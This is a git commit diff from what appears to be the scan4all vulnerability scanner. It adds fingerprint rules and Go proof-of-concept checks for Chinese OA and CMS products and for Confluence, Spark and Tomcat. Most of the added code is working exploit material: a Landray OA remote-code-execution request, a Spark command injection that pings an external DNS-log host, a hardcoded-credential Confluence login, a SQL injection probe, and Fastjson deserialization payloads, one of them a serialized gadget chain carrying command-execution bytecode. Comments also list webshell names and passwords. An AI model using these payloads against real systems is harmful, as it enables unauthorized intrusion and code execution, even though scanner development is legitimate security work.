thanks @veo masters 2022-10-03

im-sec · Oct 3, 2022 · d3e0d22 · d3e0d22
1 parent 2820dc9
commit d3e0d22
Show file tree

Hide file tree

Showing 16 changed files with 285 additions and 25 deletions.
diff --git a/pkg/fingerprint/dicts/localFinger.json b/pkg/fingerprint/dicts/localFinger.json
@@ -6580,7 +6580,7 @@
     "location": "body",
     "keyword": ["href=\"/landmark.admin.web_deploy/"]
   },{
-    "cms": "landray-oa",
+    "cms": "蓝凌 OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["lui_login_message_td"]
@@ -12220,52 +12220,52 @@
     "location": "body",
     "keyword": ["tomcat monitor uses wadl to describe services it can offer"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["href=\"/static/images/tongda.ico\""]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["<a href='http://www.tongda2000.com/' target='_black'>通达官网</a>"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["/images/tongda.ico"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["Office Anywhere"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["login","tongda2000"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["/static/templates/2013_01/index.css/"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["javascript:document.form1.uname.focus()"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["<link rel=\"shortcut icon\" href=\"/images/tongda.ico\" />"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["oa提示：不能登录oa"]
   },{
-    "cms": "tongda-oa",
+    "cms": "通达OA",
     "method": "keyword",
     "location": "body",
     "keyword": ["紧急通知：今日10点停电"]
@@ -14325,37 +14325,37 @@
     "location": "body",
     "keyword": ["shopping cart program by zen cart"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["$('#zentao').addClass('btn-success');"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["zentao/theme"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["<a id='zentaopro' href='/pro/'"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["$('#zentaopro').addclass"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["powered by <a href='http://www.zentao.net' target='_blank'>zentaopms","welcome to use zentao!"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["href='/zentao/favicon.ico"]
   },{
-    "cms": "zentao-system",
+    "cms": "禅道",
     "method": "keyword",
     "location": "body",
     "keyword": ["server: cpws"]
@@ -15649,5 +15649,10 @@
     "method": "keyword",
     "location": "body",
     "keyword": ["//xfpverifyExec.jsp;"]
+  },{
+    "cms": "铭飞MCms",
+    "method": "keyword",
+    "location": "body",
+    "keyword": ["Powered by MCms"]
   }]
 }
diff --git a/pocs_go/apache/CVE-2020-13935.go b/pocs_go/apache/CVE-2020-13935.go
@@ -55,7 +55,7 @@ func CVE_2020_13935(url string) (bool, error) {
 	buf.Write(maskingKey)
 
 	// write an incomplete message
-	buf.WriteString("test")
+	buf.WriteString("testnmanp")
 	_, err = ws.UnderlyingConn().Write(buf.Bytes())
 	if err != nil {
 		return false, fmt.Errorf("write: %s", err)

diff --git a/pocs_go/confluence/CVE_2022_26318.go b/pocs_go/confluence/CVE_2022_26318.go
@@ -0,0 +1,20 @@
+package confluence
+
+import (
+	"github.com/hktalent/scan4all/lib/util"
+)
+
+//author:penson 硬编码添加用户
+
+func CVE_2022_26138(u string) bool {
+	headers := make(map[string]string, 0)
+	headers["Content-Type"] = "application/x-www-form-urlencoded"
+	if req, err := util.HttpRequset(u+"/dologin.action", "POST", "os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=", false, headers); err == nil {
+		if req.StatusCode == 302 && req.Header.Get("X-Seraph-LoginReason") == "OK" {
+			util.SendLog(req.RequestUrl, "CVE_2022_26138", "Found Confluence ", "")
+		}
+
+		return true
+	}
+	return false
+}
diff --git a/pocs_go/fastjson/payloads.go b/pocs_go/fastjson/payloads.go
@@ -30,3 +30,69 @@ var (
 		`{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E00200007870000006D8CAFEBABE00000033006E01001D79736F73657269616C2F50776E657231303638383235383736323339380700010100106A6176612F6C616E672F4F626A65637407000301000A536F7572636546696C6501001850776E657231303638383235383736323339382E6A617661010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700070100063C696E69743E0100032829560C0009000A0A0008000B0100106A6176612F6C616E672F54687265616407000D01000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C000F00100A000E0011010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001300140A0004001501000E67657443757272656E74576F726B08001701000F6A6176612F6C616E672F436C6173730700190100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C001B001C0A001A001D0100186A6176612F6C616E672F7265666C6563742F4D6574686F6407001F010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C002100220A002000230100096765744865616465720800250100106A6176612F6C616E672F537472696E67070027010003636D640800290100116A6176612F7574696C2F5363616E6E657207002B0100116A6176612F6C616E672F52756E74696D6507002D01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002F00300A002E003101000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003300340A002E00350100116A6176612F6C616E672F50726F6365737307003701000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C0039003A0A0038003B010018284C6A6176612F696F2F496E70757453747265616D3B29560C0009003D0A002C003E0100025C4108004001000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C004200430A002C00440100046E65787401001428294C6A6176612F6C616E672F537472696E673B0C004600470A002C004801000B676574526573706F6E736508004A010016676574536572766C65744F757470757453747265616D08004C0100237765626C6F6769632E786D6C2E7574696C2E537472696E67496E70757453747265616D08004E010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C005000510A001A005201000E676574436F6E7374727563746F72010033285B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F436F6E7374727563746F723B0C005400550A001A005601001D6A6176612F6C616E672F7265666C6563742F436F6E7374727563746F7207005801000B6E6577496E7374616E6365010027285B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C005A005B0A0059005C01000B777269746553747265616D08005E0100136A6176612E696F2E496E70757453747265616D080060010005666C7573680800620100096765745772697465720800640100057772697465080066010000080068010004436F646501000A457863657074696F6E730100136A6176612F6C616E672F457863657074696F6E07006C00210002000800000000000100010009000A0002006A0000010B00060006000000FF2AB7000CB80012B60016121801B6001EB8001201B600244C2BB60016122604BD001A5903122853B6001E2B04BD00045903122A53B60024C000284DBB002C59B800322CB60036B6003CB7003F1241B60045B600494E2BB60016124B01B6001E2B01B600243A041904B60016124D01B6001E190401B600243A05124FB8005304BD001A5903122853B6005704BD000459032D53B6005D4C1905B60016125F04BD001A59031261B8005353B6001E190504BD000459032B53B60024571905B60016126301B6001E190501B60024571904B60016126501B6001E190401B600244C2BB60016126704BD001A5903122853B6001E2B04BD00045903126953B6002457B100000000006B000000040001006D000100050000000200067074000450776E7270770100787372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00095B000B69506172616D547970657371007E00087870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000E6E65775472616E73666F726D6572757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00003F4000000000000C7708000000100000000078787400017478;"}}`,
 	}
 )
+
+/* 报错检测 */
+var FS_ERR_DETECT = `{"@type": "java.lang.AutoCloseable"`
+
+/* 出网检测 */
+var TAR_NET_DETECT = `{"name":{"@type":"java.net.Inet4Address","val":"{{.Variables.DNS}}"}}`
+
+/* 延迟检测 */
+var TIME_DETECT = `{"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaa{{.Variables.Value}}!"}`
+
+/* AutoType检测 */
+var AUTOTYPE_CHECK = `[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"{{.Variables.DNS}}"}]`
+
+/************************************************
+***                  DNS检测                   ***
+*************************************************/
+// fastjson < 1.2.48
+var DNS_DETECT_48 = `
+[
+    {"@type":"java.lang.Class","val":"java.io.ByteArrayOutputStream"},
+    {"@type":"java.io.ByteArrayOutputStream"},
+    {"@type":"java.net.InetSocketAddress"{"address":,"val":"48_.{{.Variables.DNS}}"}}
+]
+`
+
+// 1.2.48 ≤ fastjson ≤ 1.2.68
+var DNS_DETECT_68 = `
+{
+    "a": {
+        "@type": "java.lang.AutoCloseable",
+        "@type": "com.alibaba.fastjson.JSONReader",
+        "reader": {
+            "@type": "jdk.nashorn.api.scripting.URLReader",
+            "url": "http://68_.{{.Variables.DNS}}"
+        }
+    }
+}
+`
+
+// 1.2.68 < fastjson ≤ 1.2.83
+var DNS_DETECT_80 = `
+[
+    {
+        "@type":"java.lang.Exception","@type":"com.alibaba.fastjson.JSONException",
+		"x":{
+			"@type":"java.net.InetSocketAddress"{"address":,"val":"80_.{{.Variables.DNS}}"}
+		}
+    },
+    {
+        "@type":"java.lang.Exception","@type":"com.alibaba.fastjson.JSONException",
+		"message":{
+			"@type":"java.net.InetSocketAddress"{"address":,"val":"83_.{{.Variables.DNS}}"}
+		}
+    }
+]
+`
+
+// 依赖库检测
+//   报错探测
+var DEPENDENCY_DETECT_BY_ERR = `
+{
+	"@type":"java.lang.Character"{
+		"@type":"java.lang.Class",
+		"val":"{{.Variables.Dependency}}"
+}
+`
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
@@ -14,15 +14,20 @@ import (
 	"github.com/hktalent/scan4all/pocs_go/gitlab"
 	"github.com/hktalent/scan4all/pocs_go/jboss"
 	"github.com/hktalent/scan4all/pocs_go/jenkins"
+	"github.com/hktalent/scan4all/pocs_go/landray"
 	"github.com/hktalent/scan4all/pocs_go/log4j"
+	"github.com/hktalent/scan4all/pocs_go/mcms"
 	"github.com/hktalent/scan4all/pocs_go/ms"
 	"github.com/hktalent/scan4all/pocs_go/phpunit"
 	"github.com/hktalent/scan4all/pocs_go/seeyon"
 	"github.com/hktalent/scan4all/pocs_go/shiro"
+	"github.com/hktalent/scan4all/pocs_go/spark"
 	"github.com/hktalent/scan4all/pocs_go/sunlogin"
 	"github.com/hktalent/scan4all/pocs_go/tomcat"
+	"github.com/hktalent/scan4all/pocs_go/tongda"
 	"github.com/hktalent/scan4all/pocs_go/weblogic"
 	"github.com/hktalent/scan4all/pocs_go/zabbix"
+	"github.com/hktalent/scan4all/pocs_go/zentao"
 	"log"
 	"net/url"
 	"strings"
@@ -246,6 +251,9 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, chec
 			if confluence.CVE_2022_26134(URL) {
 				technologies = append(technologies, "exp-confluence|CVE_2022_26134")
 			}
+			if confluence.CVE_2022_26138(URL) {
+				technologies = append(technologies, "exp-confluence|CVE_2022_26138")
+			}
 		case "f5 big ip":
 			if f5.CVE_2020_5902(URL) {
 				technologies = append(technologies, "exp-f5-Big-IP|CVE_2020_5902")
@@ -256,7 +264,34 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, chec
 			if f5.CVE_2022_1388(URL) {
 				technologies = append(technologies, "exp-f5-Big-IP|CVE_2022_1388")
 			}
+		case "禅道":
+			if zentao.CNVD_2022_42853(URL) {
+				technologies = append(technologies, "GoPOC_禅道|CNVD_2022_42853")
+			}
+		case "spark-jobs":
+			if spark.CVE_2022_33891(URL) {
+				technologies = append(technologies, "GoPOC_spark|CVE_2022_33891")
+			}
+		case "蓝凌 OA":
+			if landray.Landray_RCE(URL) {
+				technologies = append(technologies, "GoPOC_Landray|Landray_RCE")
+			}
+		case "通达OA":
+			if tongda.Get_user_session(URL) {
+				technologies = append(technologies, "GoPOC_Tongda|Tongda_get_user_session")
+			}
+			if tongda.File_delete(URL) {
+				technologies = append(technologies, "GoPOC_Tongda|Tongda_File_delete")
+			}
+			if tongda.File_upload(URL) {
+				technologies = append(technologies, "GoPOC_Tongda|Tongda_File_upload")
+			}
+		case "铭飞MCms":
+			if mcms.Front_Sql_inject(URL) {
+				technologies = append(technologies, "GoPOC_Mcms|Mcms_Front_Sql_inject")
+			}
 		}
+
 		if checklog4j {
 			if log4j.Check(URL, finalURL) {
 				technologies = append(technologies, "exp-log4j|JNDI RCE")

diff --git a/pocs_go/landray/Landray_RCE.go b/pocs_go/landray/Landray_RCE.go
@@ -0,0 +1,18 @@
+package landray
+
+import (
+	"github.com/hktalent/scan4all/lib/util"
+	"strings"
+)
+
+func Landray_RCE(u string) bool {
+	payload := "s_bean=sysFormulaSimulateByJS&script=function%20test(){return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"echo%20yes\")&type=1"
+	if resp, err := util.HttpRequset(u+"/data/sys-common/datajson.js?"+payload, "GET", "", false, nil); err == nil {
+		if strings.Contains(resp.Body, "模拟通过") {
+			util.SendLog(resp.RequestUrl, "Landray_RCE", "Found vuln Landray OA RCE", payload)
+			return true
+		}
+	}
+
+	return false
+}
diff --git a/pocs_go/mcms/Front_Desk_sqlinject.go b/pocs_go/mcms/Front_Desk_sqlinject.go
@@ -0,0 +1,20 @@
+package mcms
+
+import (
+	"fmt"
+	"github.com/hktalent/scan4all/lib/util"
+
+	"strings"
+)
+
+//mcms 5.2.7 /cms/content/list
+func Front_Sql_inject(u string) bool {
+	if req, err := util.HttpRequset(u+"/cms/content/list", "POST", "categoryId=1'", false, nil); err == nil {
+		if strings.Contains(req.Body, "error in your SQL") {
+			util.SendLog(req.RequestUrl, "mcms_sql_inject", fmt.Sprintf("Found mcms_sql_inject|\"%s\"\n", u+"/cms/content/list|POST:categoryId"), "")
+			return true
+		}
+	}
+
+	return false
+}
diff --git a/pocs_go/seeyon/BackdoorScan.go b/pocs_go/seeyon/BackdoorScan.go
@@ -11,7 +11,7 @@ import (
 //test123456.jsp?pwd=asasd3344&cmd=cmd+/c+whoami
 //qwer960452.jsp?pwd=el38A9485&cmd=cmd+/c+whoami
 //a234.jspx pass:rebeyond
-//test10086.jsp 蚁剑密码: test
+//test10086.jsp 蚁剑密码: testnmanp
 //peiqi10086.jsp 蚁剑密码: peiqi
 
 func BackdoorScan(u string) bool {

diff --git a/pocs_go/seeyon/sql.go b/pocs_go/seeyon/sql.go
@@ -1,4 +1,4 @@
 package seeyon
 
-//'A6 test.jsp SQL注入漏洞'
+//'A6 testnmanp.jsp SQL注入漏洞'
 //'A6 setextno.jsp SQL注入漏洞'
diff --git a/pocs_go/spark/CVE_2022_33891.go b/pocs_go/spark/CVE_2022_33891.go
@@ -0,0 +1,21 @@
+package spark
+
+import (
+	"fmt"
+	"github.com/hktalent/scan4all/lib/util"
+	"time"
+)
+
+func CVE_2022_33891(u string) bool {
+	if util.CeyeApi != "" && util.CeyeDomain != "" {
+		randomstr := util.RandomStr()
+		payload := fmt.Sprintf("doAs=`ping%%20%s`", randomstr+"."+util.CeyeDomain)
+		req, _ := util.HttpRequset(u+"/jobs/?"+payload, "GET", "", false, nil)
+		time.Sleep(3 * time.Second)
+		if util.Dnslogchek(randomstr) {
+			util.SendLog(req.RequestUrl, "CVE_2022_33891", "Found vuln Apache Spark CVE_2022_33891", payload)
+			return true
+		}
+	}
+	return false
+}
diff --git a/pocs_go/tomcat/CVE_2017_12615.go b/pocs_go/tomcat/CVE_2017_12615.go
@@ -5,9 +5,9 @@ import (
 )
 
 func CVE_2017_12615(url string) bool {
-	if req, err := util.HttpRequset(url+"/vtset.txt", "PUT", "test", false, nil); err == nil {
+	if req, err := util.HttpRequset(url+"/vtset.txt", "PUT", "testnmanp", false, nil); err == nil {
 		if req.StatusCode == 204 || req.StatusCode == 201 {
-			util.SendLog(req.RequestUrl, "CVE-2017-12615", "Found vuln Tomcat", "test")
+			util.SendLog(req.RequestUrl, "CVE-2017-12615", "Found vuln Tomcat", "testnmanp")
 			return true
 		}
 	}